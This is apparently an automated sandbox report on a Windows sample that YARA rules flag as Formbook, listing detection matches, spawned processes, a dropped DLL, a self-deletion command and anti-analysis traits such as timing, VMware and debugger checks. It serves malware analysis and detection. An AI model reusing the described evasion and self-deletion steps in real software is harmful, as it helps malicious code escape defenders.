Source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/3@15/11
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 0_2_004041E5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_004041E5
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 0_2_004020A6 CoCreateInstance,MultiByteToWideChar, 0_2_004020A6
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5988:120:WilError_01
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe File created: C:\Users\user\AppData\Local\Temp\nsvE791.tmp Jump to behavior
Source: NdBLyH2h5d.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: NdBLyH2h5d.exe Virustotal: Detection: 20%
Source: NdBLyH2h5d.exe ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe File read: C:\Users\user\Desktop\NdBLyH2h5d.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\NdBLyH2h5d.exe 'C:\Users\user\Desktop\NdBLyH2h5d.exe'
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Process created: C:\Users\user\Desktop\NdBLyH2h5d.exe 'C:\Users\user\Desktop\NdBLyH2h5d.exe'
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NdBLyH2h5d.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Process created: C:\Users\user\Desktop\NdBLyH2h5d.exe 'C:\Users\user\Desktop\NdBLyH2h5d.exe' Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NdBLyH2h5d.exe' Jump to behavior
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: Binary string: wntdll.pdbUGP source: NdBLyH2h5d.exe, 00000000.00000003.216210756.000000001EFE0000.00000004.00000001.sdmp, NdBLyH2h5d.exe, 00000001.00000002.252496199.0000000000AFF000.00000040.00000001.sdmp, rundll32.exe, 00000006.00000002.481925699.00000000046FF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: NdBLyH2h5d.exe, rundll32.exe
Source: Binary string: rundll32.pdb source: NdBLyH2h5d.exe, 00000001.00000002.253158543.0000000002640000.00000040.00000001.sdmp
Source: Binary string: rundll32.pdbGCTL source: NdBLyH2h5d.exe, 00000001.00000002.253158543.0000000002640000.00000040.00000001.sdmp

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Unpacked PE file: 1.2.NdBLyH2h5d.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode, 0_2_00401FDC
PE file contains sections with non-standard names
Source: 6oxdti6l9qd.dll.0.dr Static PE information: section name: .code
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_0041C8CC push es; ret 1_2_0041C8D3
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_0041925A push esp; retf 1_2_0041925F
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_0041B3F2 push eax; ret 1_2_0041B3F8
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_0041B3FB push eax; ret 1_2_0041B462
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_0041B3A5 push eax; ret 1_2_0041B3F8
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_0041B45C push eax; ret 1_2_0041B462
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A5D0D1 push ecx; ret 1_2_00A5D0E4
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_0041C8CC push es; ret 1_1_0041C8D3
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_0041925A push esp; retf 1_1_0041925F
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_0041B3F2 push eax; ret 1_1_0041B3F8
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_0041B3FB push eax; ret 1_1_0041B462
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_0041B3A5 push eax; ret 1_1_0041B3F8
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_0041B45C push eax; ret 1_1_0041B462
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0465D0D1 push ecx; ret 6_2_0465D0E4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BB925A push esp; retf 6_2_02BB925F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BBB3A5 push eax; ret 6_2_02BBB3F8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BBB3FB push eax; ret 6_2_02BBB462
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BBB3F2 push eax; ret 6_2_02BBB3F8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BBC8CC push es; ret 6_2_02BBC8D3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BBB45C push eax; ret 6_2_02BBB462

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe File created: C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll Jump to dropped file
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 0000000002BA85E4 second address: 0000000002BA85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 0000000002BA896E second address: 0000000002BA8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_004088A0 rdtsc 1_2_004088A0
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 6540 Thread sleep time: -70000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA, 0_2_00405301
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose, 0_2_00405C94
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 0_2_004026BC FindFirstFileA, 0_2_004026BC
Source: explorer.exe, 00000004.00000000.233384831.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000004.00000000.233384831.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000004.00000000.228623277.00000000056A1000.00000004.00000001.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.233670194.0000000008907000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
Source: explorer.exe, 00000004.00000000.232958897.0000000008220000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000004.00000000.233210221.0000000008640000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000002.492571726.00000000055D0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: explorer.exe, 00000004.00000000.233384831.000000000871F000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000004.00000000.233384831.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000004.00000000.233471521.00000000087D1000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00ices
Source: explorer.exe, 00000004.00000000.228573395.0000000005603000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000004.00000000.232958897.0000000008220000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000004.00000000.232958897.0000000008220000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000004.00000000.232958897.0000000008220000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_004088A0 rdtsc 1_2_004088A0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00409B10 LdrLoadDll, 1_2_00409B10
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 0_2_740D1000 Rcxlxosdkhvclf,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,VirtualProtect, 0_2_740D1000
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode, 0_2_00401FDC
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 0_2_02631868 mov eax, dword ptr fs:[00000030h] 0_2_02631868
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 0_2_02631650 mov eax, dword ptr fs:[00000030h] 0_2_02631650
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A320A0 mov eax, dword ptr fs:[00000030h] 1_2_00A320A0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A320A0 mov eax, dword ptr fs:[00000030h] 1_2_00A320A0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A320A0 mov eax, dword ptr fs:[00000030h] 1_2_00A320A0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A320A0 mov eax, dword ptr fs:[00000030h] 1_2_00A320A0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A320A0 mov eax, dword ptr fs:[00000030h] 1_2_00A320A0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A320A0 mov eax, dword ptr fs:[00000030h] 1_2_00A320A0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A490AF mov eax, dword ptr fs:[00000030h] 1_2_00A490AF
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3F0BF mov ecx, dword ptr fs:[00000030h] 1_2_00A3F0BF
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3F0BF mov eax, dword ptr fs:[00000030h] 1_2_00A3F0BF
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3F0BF mov eax, dword ptr fs:[00000030h] 1_2_00A3F0BF
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A09080 mov eax, dword ptr fs:[00000030h] 1_2_00A09080
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A83884 mov eax, dword ptr fs:[00000030h] 1_2_00A83884
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A83884 mov eax, dword ptr fs:[00000030h] 1_2_00A83884
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A040E1 mov eax, dword ptr fs:[00000030h] 1_2_00A040E1
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A040E1 mov eax, dword ptr fs:[00000030h] 1_2_00A040E1
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A040E1 mov eax, dword ptr fs:[00000030h] 1_2_00A040E1
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A058EC mov eax, dword ptr fs:[00000030h] 1_2_00A058EC
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A9B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00A9B8D0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A9B8D0 mov ecx, dword ptr fs:[00000030h] 1_2_00A9B8D0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A9B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00A9B8D0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A9B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00A9B8D0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A9B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00A9B8D0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A9B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00A9B8D0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A1B02A mov eax, dword ptr fs:[00000030h] 1_2_00A1B02A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A1B02A mov eax, dword ptr fs:[00000030h] 1_2_00A1B02A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A1B02A mov eax, dword ptr fs:[00000030h] 1_2_00A1B02A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A1B02A mov eax, dword ptr fs:[00000030h] 1_2_00A1B02A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3002D mov eax, dword ptr fs:[00000030h] 1_2_00A3002D
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3002D mov eax, dword ptr fs:[00000030h] 1_2_00A3002D
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3002D mov eax, dword ptr fs:[00000030h] 1_2_00A3002D
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3002D mov eax, dword ptr fs:[00000030h] 1_2_00A3002D
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3002D mov eax, dword ptr fs:[00000030h] 1_2_00A3002D
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD4015 mov eax, dword ptr fs:[00000030h] 1_2_00AD4015
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD4015 mov eax, dword ptr fs:[00000030h] 1_2_00AD4015
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A87016 mov eax, dword ptr fs:[00000030h] 1_2_00A87016
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A87016 mov eax, dword ptr fs:[00000030h] 1_2_00A87016
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A87016 mov eax, dword ptr fs:[00000030h] 1_2_00A87016
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD1074 mov eax, dword ptr fs:[00000030h] 1_2_00AD1074
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC2073 mov eax, dword ptr fs:[00000030h] 1_2_00AC2073
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A20050 mov eax, dword ptr fs:[00000030h] 1_2_00A20050
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A20050 mov eax, dword ptr fs:[00000030h] 1_2_00A20050
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A361A0 mov eax, dword ptr fs:[00000030h] 1_2_00A361A0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A361A0 mov eax, dword ptr fs:[00000030h] 1_2_00A361A0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC49A4 mov eax, dword ptr fs:[00000030h] 1_2_00AC49A4
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC49A4 mov eax, dword ptr fs:[00000030h] 1_2_00AC49A4
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC49A4 mov eax, dword ptr fs:[00000030h] 1_2_00AC49A4
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC49A4 mov eax, dword ptr fs:[00000030h] 1_2_00AC49A4
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A869A6 mov eax, dword ptr fs:[00000030h] 1_2_00A869A6
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A851BE mov eax, dword ptr fs:[00000030h] 1_2_00A851BE
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A851BE mov eax, dword ptr fs:[00000030h] 1_2_00A851BE
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A851BE mov eax, dword ptr fs:[00000030h] 1_2_00A851BE
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A851BE mov eax, dword ptr fs:[00000030h] 1_2_00A851BE
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A2C182 mov eax, dword ptr fs:[00000030h] 1_2_00A2C182
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3A185 mov eax, dword ptr fs:[00000030h] 1_2_00A3A185
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A32990 mov eax, dword ptr fs:[00000030h] 1_2_00A32990
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A0B1E1 mov eax, dword ptr fs:[00000030h] 1_2_00A0B1E1
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A0B1E1 mov eax, dword ptr fs:[00000030h] 1_2_00A0B1E1
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A0B1E1 mov eax, dword ptr fs:[00000030h] 1_2_00A0B1E1
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A941E8 mov eax, dword ptr fs:[00000030h] 1_2_00A941E8
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A24120 mov eax, dword ptr fs:[00000030h] 1_2_00A24120
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A24120 mov eax, dword ptr fs:[00000030h] 1_2_00A24120
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A24120 mov eax, dword ptr fs:[00000030h] 1_2_00A24120
